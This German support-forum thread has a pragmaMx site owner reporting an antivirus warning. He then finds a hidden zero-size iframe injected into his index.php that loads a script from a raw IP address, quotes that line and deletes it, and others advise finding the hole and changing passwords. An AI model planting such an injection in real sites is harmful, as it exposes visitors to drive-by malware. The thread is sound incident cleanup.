. .
pragmaMx Support Forum 25 Mai 2012, 16:22:05 *
Willkommen Gast. Bitte einloggen oder registrieren.


 Einloggen mit Benutzername und Passwort
News:
Brauchen Sie Hilfe? Bitte nutzen Sie unsere Suchfunktion bevor Sie Beiträge oder Fragen ins Board schreiben! Viele Fragen wurden bereits gestellt und beantwortet. Danke!
 
Übersicht Hilfe Forenregeln / Boardrules
 
Suche
Seiten: [1]   Nach unten
« vorheriges nächstes »
Drucken
Autor Thema: trojanisches Programm  (Gelesen 1370 mal)
0 Mitglieder und 2 Gäste betrachten dieses Thema.
adorno
neu hier
*
Offline Offline

Geschlecht: Männlich
Beiträge: 13

adorno


WWW
« am: 21 Mai 2008, 15:25:51 »
Hi,

nachdem ich das neue pragmaMX installiert habe erscheint bei meinem antiviren Programm, nur wenn ich mich auf diese eine Seite einwähle (meine Seite www.weniger.cc):

Zitat
gefunden: trojanisches Programm Packed.JS.Agent.a   
URL: http://xs.activeprotect.cn/lex/index.php

Ich benutze Kaspersky Firewall+Antivirus
Bei meinen Bekannten erscheint die gleiche meldung. Mittlerweile hab blockiere ich diese Verbindung

Beim landen der Seite sieht man auch in der Fortschrittleiste, dass ein Verbindungsaufbau zu dieser Seite versucht wird.

Kennt jemand dieses Problem.

gruß
adorno
Gespeichert
Andi
Administrator
******
Offline Offline

Geschlecht: Männlich
Beiträge: 19.424

Andi


WWW
« Antworten #1 am: 21 Mai 2008, 16:06:41 »
Moin Smiley

das deutet auf einen Serverhack hin.
Vermutlich hat irgendein Schadprogramm einige Dateien verändert.

Rufe mal im Adminmenü die Versionsüberwachung auf und schau ob dort geänderte Dateien gelistet sind.
Gespeichert
schön´s Grüssle, Andi
Kein Support über PN, Mail oder ICQ!
Bitte die Fragen im Forum stellen, nur so helfen die Antworten auch den anderen Usern.
Bitte auch die Boardsuche nicht vergessen, oft ist genau dein Problem schon an anderer Stelle gelöst worden!
adorno
neu hier
*
Offline Offline

Geschlecht: Männlich
Beiträge: 13

adorno


WWW
« Antworten #2 am: 21 Mai 2008, 17:12:50 »
hi Andi,

danke du hattest recht dort stand, dass die index.php editiert wurde, also habe ich da reingeschaut. Dort stand am ende folgendes:

Code: [Select]  
<? echo '<iframe src="http://92.62.100.57/stds/go.php?sid=1" width="0" height="0"
frameborder="0"></iframe>'; ?>

habe diese Zeile jetzt gelöscht.

danke
adorno
Gespeichert
GerhardSt
Unerreicht
******
Offline Offline

Geschlecht: Männlich
Beiträge: 1.035

GerhardSt
« Antworten #3 am: 21 Mai 2008, 17:40:47 »
Hi adorno, Smiley

du solltest aber trotzdem noch schauen, wodurch diese Änderung möglich war (Serverlog) und diese Lücke schliessen.
Weiters empfehle ich dir Datenbank und FTP-Passwörter zu ändern.

Gruß Gerhard
Gespeichert
CMS-Version: pragmaMx 0.1.11.3, 1.33.2.12.2.9.2.3/2010-08-02
PHP-Version: 5.3.3-0.dotdeb.1
MySQL-Version: 5.0.51a-24+lenny4
Server-Version: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch

IE 8 oder Firefox
Seiten: [1]   Nach oben
Drucken
« vorheriges nächstes »
 
Gehe zu:  

Powered by SMF 1.1.16 | SMF © 2011, Simple Machines
design by hENNE, layout based on YAML